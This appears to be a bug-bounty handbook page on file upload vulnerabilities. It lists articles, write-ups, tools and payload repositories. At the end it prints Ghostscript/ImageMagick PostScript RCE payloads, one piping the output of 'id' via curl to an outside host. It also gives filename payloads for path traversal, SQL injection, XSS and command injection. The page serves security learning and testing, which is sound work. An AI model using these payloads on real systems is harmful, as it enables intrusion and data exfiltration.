Bug Hunter Handbook
Ctrlk
  • Introduction
  • Getting Started in InfoSec and Bug Bounties.
  • Presentations
  • Checklists / Guides
  • Useful Twitter Threads
  • List of Vulnerabilities
    • Recon and OSINT
    • Host Header
    • Injection
    • DNS Rebinding
    • Cross Site Scripting (XSS)
    • Cross Origin Resource Sharing (CORS)
    • Local / Remote File Inclusion (LFI / RFI)
    • Server Side Request Forgery (SSRF)
    • Remote Code Execution (RCE)
    • XML Entity Injecton (XXE)
    • Price Manipulation
    • Directory / Path Traversal
    • Cross Site Request Forgery (CSRF)
    • Password Reset
    • Login Page Issues
    • Deserialization Attacks
    • File Upload
    • Account Takeover
    • Insecure Direct Object References (IDOR)
    • Open Redirect
    • Business Logic Flaws
    • Rate Limit Bypass / 2FA / OTP Bypass
    • Ruby on Rails
    • S3 Bucket
    • Race Condition
    • CRLF
    • SSTI
    • Prototype Pollution
  • Approach
  • API Security
  • Mobile Security
  • Fuzzing / Wordlists
  • BugBounty Short Write-ups
  • Burp Suite Tips and Tricks
  • HackerOne Reports
  • Response Manipulation
  • Client Vs Server Side Vulnerabilities
  • DevSecOps
  • Containers
  • AWS
  • Azure
  • Others
  • Chaining of Bugs
  • Bug Bounty Automation
  • Mindmaps
  • Oneliner Collections
  • Red Teaming
  • Blue Teamining
  • Recon One Liners
  • Misc
  • Wordpress
  • Fuzzing / FuFF
  • OWASP ZAP
  • Bug List
  • Setting up burp collaborator
  • Admin Panel PwN
  • Credential Stuffing / Dump / HaveibeenPwned?
  • Tools Required
  • Nuclei Template
  • Other BugBounty Repos / Tips
  • Interview
  • Threat Modelling
  • AppSec
Powered by GitBook
On this page
  1. List of Vulnerabilities

File Upload

Blogs / Articles:

  • https://anotherhackerblog.com/exploiting-file-uploads-pt-2/

  • https://anotherhackerblog.com/exploiting-file-uploads-pt1/

  • https://medium.com/@dPhoeniixx/vimeo-upload-function-ssrf-7466d8630437

  • https://infosecwriteups.com/bragging-rights-killing-file-uploads-softly-fba35a4e485a

  • https://blog.yeswehack.com/yeswerhackers/exploitation/file-upload-attacks-part-1/

  • https://infosecwriteups.com/bragging-rights-killing-file-uploads-softly-fba35a4e485a

  • https://blog.yeswehack.com/yeswerhackers/file-upload-attacks-part-2/

  • https://0xn3va.gitbook.io/cheat-sheets/web-application/file-upload-vulnerabilities

Writeups:

  • https://link.medium.com/sILCWr8xB3

  • https://link.medium.com/V8SdaJ8xB3

  • https://link.medium.com/fRfag0byB3

  • https://link.medium.com/6qTQZwayB3

  • https://link.medium.com/jFGhtvbyB3

Tools:

  • Burp Suite Extension - Upload Scanner

  • https://github.com/almandin/fuxploider

  • https://github.com/ptoomey3/evilarc

Cheatsheets:

Payloads:

  • https://github.com/daffainfo/AllAboutBugBounty/blob/master/BypassFileUpload.md

Imagemagick RCE:

Tweets:

https://twitter.com/hunter0x7/status/1346397333072846848?s=20
https://twitter.com/HolyBugx/status/1348928810620743682?s=20

Bug: XSS through file upload.

LogoFile upload tricks and checklist - OnSecurityOnSecurity
PreviousDeserialization AttacksNextAccount Takeover

Last updated 3 years ago

Was this helpful?

Was this helpful?

%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%curl${IFS}zero-way.net/cc`id`) currentdevice 
putdeviceprops


%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%wget http://https://helloworld.free.beeceptor.com) currentdevice 
putdeviceprops
Chaining file uploads with other vulns:-

 Set filename to:- 

> ../../../tmp/lol.png for path traversals
> sleep(10)-- -.jpg for SQLi.
> <svg onload=alert(document.comain)>.jpg/png for xss
> ; sleep 10; for command injections
Payload: */alert(1)</script><script>/*